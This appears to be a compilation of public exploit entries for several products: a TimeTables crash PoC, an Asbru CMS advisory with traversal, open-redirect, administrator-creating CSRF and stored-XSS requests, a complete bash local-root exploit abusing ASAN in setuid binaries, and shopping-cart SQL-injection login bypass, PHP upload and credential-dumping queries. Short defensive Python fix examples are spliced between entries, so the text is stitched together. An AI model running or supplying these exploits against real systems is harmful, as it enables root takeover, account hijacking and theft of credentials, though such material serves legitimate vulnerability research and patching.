# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2020.11.4
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Open the program aSc Timetables 2020
# In File select the option New
# Put any letter in the field Name of the School and click Next
# In the next window click NEXT
# In Step 3, under Subject click New
# Run the python exploit script, it will create a new .txt file
# Copy the content of the file "Tables.txt"
# Paste the content in the field Subject title
# Click OK
# End :)


# Payload written to Tables.txt; the steps above paste it into the Subject title field
buffer = 'Z' * 1000

try:
    with open("Tables.txt", "w") as file:
        file.write(buffer)
    print("Archive ready")
except OSError:
    print("Archive no ready")
            
# Exploit Title: aSc Timetables 2017 input field buffer overflow and code execution
# Date: 2017-01-12
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/Timetables.zip
# Exploit documentation: http://saptech-erp.com.au/resources/TimeTables_2017.pdf
# Software Link: http://www.asctimetables.com/download/aScTimeTables.exe  
# Version: 1.0.0.1
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64, Windows Server 2012 R2 x64, Windows Server 2016 x64

POC:

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41031.zip

 
            

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on : Apache Tomcat/5.5.23
            Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
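The two server-side checks that close #1 and #2, as an added Python example (not code from the advisory or from Asbru). The document root `/var/www/site`, the function names and the use of `10.0.0.7` from the PoC URLs as the application's own host are assumptions; the `WEB-INF`/`META-INF` rule is the servlet specification's, which says those directories are never served to clients.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Added example, not Asbru's code: the checks a fix for #1 (traversal) and
# #2 (open redirect) needs. WEB_ROOT, the host and the names are assumed.

WEB_ROOT = "/var/www/site"                     # assumed document root
PROTECTED_DIRS = ("WEB-INF", "META-INF")       # servlet spec: never served to clients


def resolve_under_root(requested: str, root: str = WEB_ROOT):
    """Map a request path to a file under root; return None if it escapes
    root or names a protected directory. Percent-encoding is decoded first."""
    path = unquote(requested)
    if "\x00" in path or "\\" in path:
        return None
    # root the path and collapse '.' and '..' segments; normpath turns
    # '/../../../../../WEB-INF/web.xml' into '/WEB-INF/web.xml', so the
    # traversal is absorbed and the protected-directory check decides
    norm = posixpath.normpath("/" + path.lstrip("/"))
    top = norm.split("/")[1] if norm != "/" else ""
    if top.upper() in PROTECTED_DIRS:
        return None
    full = posixpath.normpath(posixpath.join(root, norm.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None      # defence in depth: still outside the root
    return full


def safe_redirect_target(url: str, own_host: str = "10.0.0.7", default: str = "/"):
    """Return a redirect target on own_host only. Anything pointing elsewhere
    (other hosts, '//host' scheme-relative URLs, non-http schemes) becomes default."""
    parts = urlsplit(url.strip())
    if parts.scheme and parts.scheme not in ("http", "https"):
        return default
    if parts.netloc and parts.netloc.lower() != own_host.lower():
        return default
    path = parts.path or "/"
    # keep only the local part; '//' and '\' prefixes are rejected because
    # browsers read '/\evil' and '//evil' as a new host
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return default
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    print(resolve_under_root("/../../../../../WEB-INF/web.xml"))   # None
    print(resolve_under_root("/images/logo.gif"))
    print(safe_redirect_target("http://www.zeroscience.mk"))      # "/"
    print(safe_redirect_target("/webadmin/index.jsp?x=1"))
```

Both functions decode once and normalise before deciding, which is the order a front-end proxy such as the Apache in front of Tomcat here would otherwise get wrong; `safe_redirect_target` returns only the local path and query, so `login_post.jsp?url=` can never leave the site whatever the parameter holds.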


#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
  <body>
    <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
      <input type="hidden" name="userinfo" value="&#13;&#10;<TEST><&#47;TEST>&#13;&#10;" />
      <input type="hidden" name="title" value="Mr" />
      <input type="hidden" name="name" value="Chekmidash" />
      <input type="hidden" name="organisation" value="ZSL" />
      <input type="hidden" name="email" value="test&#64;testingus&#46;io" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
      <input type="hidden" name="birthday" value="01" />
      <input type="hidden" name="birthmonth" value="01" />
      <input type="hidden" name="birthyear" value="1984" />
      <input type="hidden" name="notes" value="CSRFNote" />
      <input type="hidden" name="userinfo1" value="" />
      <input type="hidden" name="userinfoname" value="" />
      <input type="hidden" name="username" value="hackedusername" />
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="userclass" value="administrator" />
      <input type="hidden" name="usergroup" value="" />
      <input type="hidden" name="usertype" value="" />
      <input type="hidden" name="usergroups" value="Account&#32;Managers" />
      <input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
      <input type="hidden" name="usergroups" value="Customer" />
      <input type="hidden" name="usergroups" value="Event&#32;Managers" />
      <input type="hidden" name="usergroups" value="Financial&#32;Officers" />
      <input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
      <input type="hidden" name="usergroups" value="Human&#32;Resources" />
      <input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
      <input type="hidden" name="usergroups" value="Intranet&#32;Users" />
      <input type="hidden" name="usergroups" value="Newsletter" />
      <input type="hidden" name="usergroups" value="Press&#32;Officers" />
      <input type="hidden" name="usergroups" value="Product&#32;Managers" />
      <input type="hidden" name="usergroups" value="Registered&#32;Users" />
      <input type="hidden" name="usergroups" value="Shop&#32;Managers" />
      <input type="hidden" name="usergroups" value="Subscribers" />
      <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
      <input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
      <input type="hidden" name="usergroups" value="User&#32;Managers" />
      <input type="hidden" name="usergroups" value="Website&#32;Administrators" />
      <input type="hidden" name="usergroups" value="Website&#32;Developers" />
      <input type="hidden" name="users&#95;group" value="" />
      <input type="hidden" name="users&#95;type" value="" />
      <input type="hidden" name="creators&#95;group" value="" />
      <input type="hidden" name="creators&#95;type" value="" />
      <input type="hidden" name="editors&#95;group" value="" />
      <input type="hidden" name="editors&#95;type" value="" />
      <input type="hidden" name="publishers&#95;group" value="" />
      <input type="hidden" name="publishers&#95;type" value="" />
      <input type="hidden" name="administrators&#95;group" value="" />
      <input type="hidden" name="administrators&#95;type" value="" />
      <input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
      <input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
      <input type="hidden" name="scheduled&#95;notify" value="" />
      <input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
      <input type="hidden" name="scheduled&#95;unpublish" value="" />
      <input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
      <input type="hidden" name="invoice&#95;name" value="Icebreaker" />
      <input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
      <input type="hidden" name="invoice&#95;address" value="nu" />
      <input type="hidden" name="invoice&#95;postalcode" value="1300" />
      <input type="hidden" name="invoice&#95;city" value="Neverland" />
      <input type="hidden" name="invoice&#95;state" value="ND" />
      <input type="hidden" name="invoice&#95;country" value="ND" />
      <input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
      <input type="hidden" name="invoice&#95;fax" value="" />
      <input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
      <input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
      <input type="hidden" name="delivery&#95;name" value="" />
      <input type="hidden" name="delivery&#95;organisation" value="" />
      <input type="hidden" name="delivery&#95;address" value="" />
      <input type="hidden" name="delivery&#95;postalcode" value="" />
      <input type="hidden" name="delivery&#95;city" value="" />
      <input type="hidden" name="delivery&#95;state" value="" />
      <input type="hidden" name="delivery&#95;country" value="" />
      <input type="hidden" name="delivery&#95;phone" value="" />
      <input type="hidden" name="delivery&#95;fax" value="" />
      <input type="hidden" name="delivery&#95;email" value="" />
      <input type="hidden" name="delivery&#95;website" value="" />
      <input type="hidden" name="card&#95;type" value="VISA" />
      <input type="hidden" name="card&#95;number" value="4444333322221111" />
      <input type="hidden" name="card&#95;issuedmonth" value="01" />
      <input type="hidden" name="card&#95;issuedyear" value="2016" />
      <input type="hidden" name="card&#95;expirymonth" value="01" />
      <input type="hidden" name="card&#95;expiryyear" value="2100" />
      <input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
      <input type="hidden" name="card&#95;cvc" value="133" />
      <input type="hidden" name="card&#95;issue" value="" />
      <input type="hidden" name="card&#95;postalcode" value="1300" />
      <input type="hidden" name="content&#95;editor" value="" />
      <input type="hidden" name="hardcore&#95;upload" value="" />
      <input type="hidden" name="hardcore&#95;format" value="" />
      <input type="hidden" name="hardcore&#95;width" value="" />
      <input type="hidden" name="hardcore&#95;height" value="" />
      <input type="hidden" name="hardcore&#95;onenter" value="" />
      <input type="hidden" name="hardcore&#95;onctrlenter" value="" />
      <input type="hidden" name="hardcore&#95;onshiftenter" value="" />
      <input type="hidden" name="hardcore&#95;onaltenter" value="" />
      <input type="hidden" name="hardcore&#95;toolbar1" value="" />
      <input type="hidden" name="hardcore&#95;toolbar2" value="" />
      <input type="hidden" name="hardcore&#95;toolbar3" value="" />
      <input type="hidden" name="hardcore&#95;toolbar4" value="" />
      <input type="hidden" name="hardcore&#95;toolbar5" value="" />
      <input type="hidden" name="hardcore&#95;formatblock" value="" />
      <input type="hidden" name="hardcore&#95;fontname" value="" />
      <input type="hidden" name="hardcore&#95;fontsize" value="" />
      <input type="hidden" name="hardcore&#95;customscript" value="" />
      <input type="hidden" name="startpage" value="" />
      <input type="hidden" name="workspace&#95;sections" value="" />
      <input type="hidden" name="index&#95;workspace" value="" />
      <input type="hidden" name="index&#95;content" value="" />
      <input type="hidden" name="index&#95;library" value="" />
      <input type="hidden" name="index&#95;product" value="" />
      <input type="hidden" name="index&#95;stock" value="" />
      <input type="hidden" name="index&#95;order" value="" />
      <input type="hidden" name="index&#95;segments" value="" />
      <input type="hidden" name="index&#95;usertests" value="" />
      <input type="hidden" name="index&#95;heatmaps" value="" />
      <input type="hidden" name="index&#95;user" value="" />
      <input type="hidden" name="index&#95;websites" value="" />
      <input type="hidden" name="menu&#95;selection" value="" />
      <input type="hidden" name="statistics&#95;reports" value="" />
      <input type="hidden" name="sales&#95;reports" value="" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
</html>


#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>
            
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
# ---
# Original exploit: https://gist.github.com/0x27/9ff2c8fb445b6ab9c94e
# Updated by <bcoles@gmail.com>
# - fixed some issues with reliability
# - replaced symlink spraying python code with C implementation
# https://github.com/bcoles/local-exploits/tree/master/asan-suid-root
# ---
# user@linux-mint-19-2:~/Desktop$ file /usr/bin/a.out 
# /usr/bin/a.out: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f9f85a5b58074eacd5b01eae970320ed22984932, stripped
#
# user@linux-mint-19-2:~/Desktop$ ldd /usr/bin/a.out | grep libasan
# 	libasan.so.4 => /usr/lib/x86_64-linux-gnu/libasan.so.4 (0x00007f028d427000)
#
# user@linux-mint-19-2:~/Desktop$ objdump -x /usr/bin/a.out | grep libasan
#   NEEDED               libasan.so.4
#
# user@linux-mint-19-2:~/Desktop$ ASAN_OPTIONS=help=1 /usr/bin/a.out 2>&1 | grep 'flags for AddressSanitizer'
# Available flags for AddressSanitizer:
#
# user@linux-mint-19-2:~/Desktop$ ./unsanitary.sh /usr/bin/a.out
# Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)
# [+] /usr/bin/a.out was compiled with libasan
# [.] Compiling /tmp/.libhax.c ...
# [.] Compiling /tmp/.rootshell.c ...
# [.] Compiling /tmp/.spray.c ...
# [.] Spraying /home/user/Desktop with symlinks ...
# [.] Adding /tmp/.libhax.so to /etc/ld.so.preload ...
# ./unsanitary.sh: line 135: 30663 Aborted                 (core dumped) ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" > /dev/null 2>&1
# [.] Cleaning up...
# [+] Success:
# -rwsr-xr-x 1 root root 8384 Jan 12 14:21 /tmp/.rootshell
# [.] Launching root shell: /tmp/.rootshell
# root@linux-mint-19-2:~/Desktop# id
# uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
# root@linux-mint-19-2:~/Desktop#
# ---

rootshell="/tmp/.rootshell"
lib="/tmp/.libhax"
spray="/tmp/.spray"

target="${1}"
log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
spray_size=100

command_exists() {
  command -v "${1}" >/dev/null 2>/dev/null
}

echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"

if [[ $# -eq 0 ]] ; then
    echo "use: $0 /full/path/to/targetbin"
    echo "where targetbin is setuid root and compiled w/ ASAN"
    exit 0
fi

if ! command_exists gcc; then
  echo '[-] gcc is not installed'
  exit 1
fi

if ! test -w .; then
  echo '[-] working directory is not writable'
  exit 1
fi

if ! test -u "${target}"; then
  echo "[-] ${target} is not setuid"
  exit 1
fi

if [[ $(/usr/bin/ldd "${target}") =~ "libasan.so" ]]; then
  echo "[+] ${target} was compiled with libasan"
else
  echo "[!] Warning: ${target} appears to have been compiled without libasan"
fi

echo "[.] Compiling ${lib}.c ..."

cat << EOF > "${lib}.c"
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

void init(void) __attribute__((constructor));

void __attribute__((constructor)) init() {
  if (setuid(0) || setgid(0))
    _exit(1);

  unlink("/etc/ld.so.preload");

  chown("${rootshell}", 0, 0);
  chmod("${rootshell}", 04755);
  _exit(0);
}
EOF

if ! gcc "${lib}.c" -fPIC -shared -ldl -o "${lib}.so"; then
  echo "[-] Compiling ${lib}.c failed"
  exit 1
fi
/bin/rm -f "${lib}.c"

echo "[.] Compiling ${rootshell}.c ..."

cat << EOF > "${rootshell}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
  setuid(0);
  setgid(0);
  execl("/bin/bash", "bash", NULL);
}
EOF

if ! gcc "${rootshell}.c" -o "${rootshell}"; then
  echo "[-] Compiling ${rootshell}.c failed"
  exit 1
fi
/bin/rm -f "${rootshell}.c"

echo "[.] Compiling ${spray}.c ..."

cat << EOF > "${spray}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
  pid_t pid = getpid();
  char buf[64];
  for (int i=0; i<=${spray_size}; i++) {
    snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
    symlink("/etc/ld.so.preload", buf);
  }
}
EOF

if ! gcc "${spray}.c" -o "${spray}"; then
  echo "[-] Compiling ${spray}.c failed"
  exit 1
fi
/bin/rm -f "${spray}.c"

echo "[.] Spraying $(pwd) with symlinks ..."

/bin/rm $log_prefix* >/dev/null 2>&1
$spray

echo "[.] Adding ${lib}.so to /etc/ld.so.preload ..."

ASAN_OPTIONS="disable_coredump=1 suppressions='/${log_prefix}
${lib}.so
' log_path=./${log_prefix} verbosity=0" "${target}" >/dev/null 2>&1

ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "${target}" >/dev/null 2>&1

echo '[.] Cleaning up...'
/bin/rm $log_prefix*
/bin/rm -f "${spray}"
/bin/rm -f "${lib}.so"

if ! test -u "${rootshell}"; then
  echo '[-] Failed'
  /bin/rm "${rootshell}"
  exit 1
fi

echo '[+] Success:'
/bin/ls -la "${rootshell}"

echo "[.] Launching root shell: ${rootshell}"
$rootshell
            
# Exploit Title: Simple PHP Shopping Cart 0.9 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
POST /[PATH]/admin/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
username=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&btnSubmit=btnSubmit
HTTP/1.1 302 Found
Date: Tue, 30 Oct 2018 15:46:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

POST /[PATH]/admin/add_cat.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=f2a7ov3iih8u10qf9327ana635
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17014069073451786011304294694
Content-Length: 514
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_name"
xxx
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="category_full_image"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------17014069073451786011304294694
Content-Disposition: form-data; name="btn_submit"
Create
-----------------------------17014069073451786011304294694--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 15:46:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

#/[PATH]/category_images/xxx_phpinfo.php

<form action="http://localhost/[PATH]/admin/add_cat.php" enctype="multipart/form-data" method="post">
<input name="category_name" value="xxx" type="text" hidden="true">
<input name="category_full_image" type="file">
<input name="btn_submit" value="Create" type="submit">
</form>
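The validation `add_cat.php` is missing, as an added Python example (not the shopping cart's code). The field name `category_full_image` and the `category_images` directory come from the PoC above; the allow-list, the function name and the `[PATH]` placeholder directory are assumptions.

```python
import os
import secrets

# Added example, not Simple PHP Shopping Cart's code: the checks an image upload
# handler such as add_cat.php needs. The allow-list and names are assumed.

UPLOAD_DIR = "/var/www/[PATH]/category_images"   # placeholder path from the advisory
ALLOWED = {                      # extension -> magic bytes a real file must start with
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def validate_image_upload(filename: str, content_type: str, data: bytes):
    """Return (ok, reason, safe_name). The client-supplied filename and
    Content-Type are hints only; the bytes and the allow-list decide."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any path component
    if "\x00" in base or "." not in base:
        return False, "no extension", None
    # 'phpinfo.php' and 'shell.php.png' are both rejected: every suffix after the
    # first dot must be allowed (double extensions are a classic bypass)
    suffixes = base.lower().split(".")[1:]
    if any(s not in ALLOWED for s in suffixes):
        return False, "extension not allowed: ." + ".".join(suffixes), None
    ext = suffixes[-1]
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match ." + ext, None
    if not content_type.lower().startswith("image/"):
        return False, "unexpected Content-Type " + content_type, None
    # never reuse the client name on disk: random name plus the validated extension
    safe_name = secrets.token_hex(16) + "." + ext
    return True, "ok", safe_name


def destination(safe_name: str) -> str:
    """Where a validated upload would be written (no write performed here)."""
    return os.path.join(UPLOAD_DIR, safe_name)


if __name__ == "__main__":
    # the PoC's upload: a .php file sent as application/force-download
    print(validate_image_upload("phpinfo.php", "application/force-download",
                                b"<?php\nphpinfo();\n?>"))
    ok, reason, name = validate_image_upload("logo.png", "image/png",
                                             b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    print(ok, reason, destination(name))
```

Because the stored name is random, the `xxx_phpinfo.php` naming shown in the PoC (category name plus original filename) cannot occur, and a file whose bytes are not an image is refused even when its extension and `Content-Type` look right. The directory the files land in should additionally be configured so the web server never executes scripts from it.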


# Exploit Title: Simple PHP Shopping Cart 0.9 - SQL Injection
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://asaancart.wordpress.com/
# Software Link: https://vorboss.dl.sourceforge.net/project/asaancart/asaancart%20v-0.9/asaancart%20v-0.9.zip
# Version: 0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/shop/page.php?page_id=[SQL]
# 
#[PATH]/page.php
#....
#34 $page_heading = $_GET['page_name'];
#35 $page_id = $_GET['page_id'];
#....
GET /[PATH]/shop/page.php?page_id=-1+unIoN++SELect+0x31%2c0x32%2c0x33%2c0x34%2c(SEleCT+GroUP_COncAT(username,0x3a,password+sePaRATOR+0x3c62723e)+FrOM+auth_user_admin)%2d%2d%20%2d HTTP/1.1
Host: TARGET
